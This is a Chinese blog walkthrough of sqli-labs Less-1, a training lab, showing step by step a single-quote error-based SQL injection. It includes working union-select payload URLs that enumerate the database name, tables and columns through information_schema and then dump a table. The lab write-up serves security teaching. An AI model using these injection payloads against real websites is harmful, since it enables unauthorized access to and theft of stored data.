sql-lab题解

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量409 收藏 1
点赞数 1
分类专栏: web 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64584221/article/details/124026001
版权

zhiLess-1–基于单引号的字符型注入

初始界面:

 上面提示:

Please input the ID as parameter with numeric value

意思是我们应该输入一个ID信息

我们给他一个id的传参 ?id=1

在id的之后面加 ’ 可判断 是否有漏洞

可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己构造的sql语句实施攻击。

然后找字段数 

确定字段数一般可以使用order by 语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 1-- qwe

执行成功;

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 2 -- qwe

执行成功; 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 3 -- qwe

执行成功; 

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4 -- qwe

报错。

意思就是没有第四个字段,也就可以推断原本的sql语句只是有用到了三个字段。

注意:

–+:结束符

–:注释符

#:注释符

因为sql语句的执行结果只有第一行会被回显在页面上,所以我们要把原始语句的的结果集变为空,这样我们想要的结果才能显示在界面上,现在我们又需要确定哪几个字段会被显示在页面上:

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,2,3 -- qwe

可以看到字段2,3被显示在了页面上。

接着可以获取数据库的库名

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,database(),3 -- qwe

 可以看出数据库名字为'security'

再接着获取表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,table_name,3 from information_schema.tables where table_schema='security' -- qwe

然后获取列名 

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails' -- qwe

 最后就可以判断字段

http://127.0.0.1/sqli-labs-master/Less-1/?id=10' union select 1,id,3 from emails -- qwe

不熬夜的羊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 详解
m0_52314120的博客
03-28 1912
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
sql题目
jack小超的博客
03-08 2304
一 在数据库 school 中建立student , sc, course 表。 学生表、课程表、选课表属于数据库 School ,其各自的数据结构如下: 学生 Student (Sno,Sname,Ssex,Sage,Sdept) 序号 列名 含义 数据类型 长度 1 Sno 学号 字符型(char) .
sql-labs通关详解(1-10)
guowu666的博客
05-02 632
sqli-labs 1-10通关详解。
sql-labs题
ing_end的博客
11-05 3881
1.Please input the ID as parameter with numeric value,意思是:请以数字值作为参数输入id。 2.通过输入id得知用户名和密码。接下来我们要查询数据库中的数据。 判断 Sql 注入漏洞的类型: 1.数字型 2.字符型 其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类...
sqli-labs解题记录
992宸的博客
02-01 1799
在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。,由此可知数据库名是8位。
SQL注入靶场通关
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 768
初学sql注入SQLi-LABS过关分享Less-3
BUUOJ-sqli_labs做题笔记
qq_52988674的博客
08-30 499
less-1 基于错误的单引号字符串 Please input the ID as parameter with numeric value根据该提示在url输入?id=1,可以看到回显正常,试着加一个单引号,页面报错 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LI
js-leetcode题解之种花问题-题解.zip
05-09
这个名为“js-leetcode题解之种花问题-题解.zip”的压缩包文件,显然是针对LeetCode中的一道具体题目——“种花问题”提供了JavaScript的解决方案。下面,我们将详细探讨这道题目及其解题策略。 “种花问题”通常是...
js-leetcode题解之最长公共前缀-题解.zip
最新发布
05-09
题解集中关注的是“最长公共前缀”问题,这是一个典型的字符串处理问题,在面试和实际项目中都有可能出现。现在,我们将深入探讨这个问题,以及如何用JavaScript来解决它。 首先,我们要理解什么是“最长公共前缀...
js-leetcode题解之字符串字符最短路径-题解.zip
05-09
题解聚焦于“字符串字符最短路径”这道LeetCode题目,通过JavaScript来求解。这道问题涉及到字符串处理、动态规划以及可能的回溯策略等核心知识点。 一、字符串处理 在JavaScript中,处理字符串是常见的操作。...
java面试-leetcode面试题解之最大数-java题解.zip
03-09
题解主要关注的是在LeetCode中的一类问题——如何找出一组数字中的最大数。这类问题在实际编程中有着广泛的应用,比如在排序算法、数据分析等领域。 首先,我们需要了解最大数问题的基本概念。在给定一个整数数组...
ccf-201312-1题解
04-17
ccf-201312-1题解
sqli-lab通关笔记
SYJ_361的博客
12-15 2602
sqli-lab通关笔记前6关 Less-1–基于单引号的字符型注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7267
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
小符sqli_labs1~65关的方法与感悟
fuyingyinger的博客
02-07 746
什么是SQL注入呢? SQL在管理数据库时,往往通过拼接的方式形成一个数据库语言,在拼接SQL语句的时候,可以通过改变SQL语句,让数据执行我们想要的语句,着同样也是危险的存在 开始前的心理准备 我真的是一脸懵啊,虽然前面也大致学过一些SQL语句,但是真当实践起来,还是懵的要死,还是多亏了学长给的资料sql注入天书还有找了找学长的博客才大致了解了这是什么东西,废话就不多说啦,冲冲冲! Page—1(Basic Challenges) Less-1 Get-Error based-Single quotes-
算法导论第二版:优化1-43题解与技巧
《算法导论第二版习题详解》由 Philip Bille 编制,旨在为 Thomas H. Cormen、Charles E. Leiserson 和 Ronald L. Rivest 著的《算法导论》中的部分习题提供一种参考解答。作者明确表示,他不对文档内容负责,因为这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值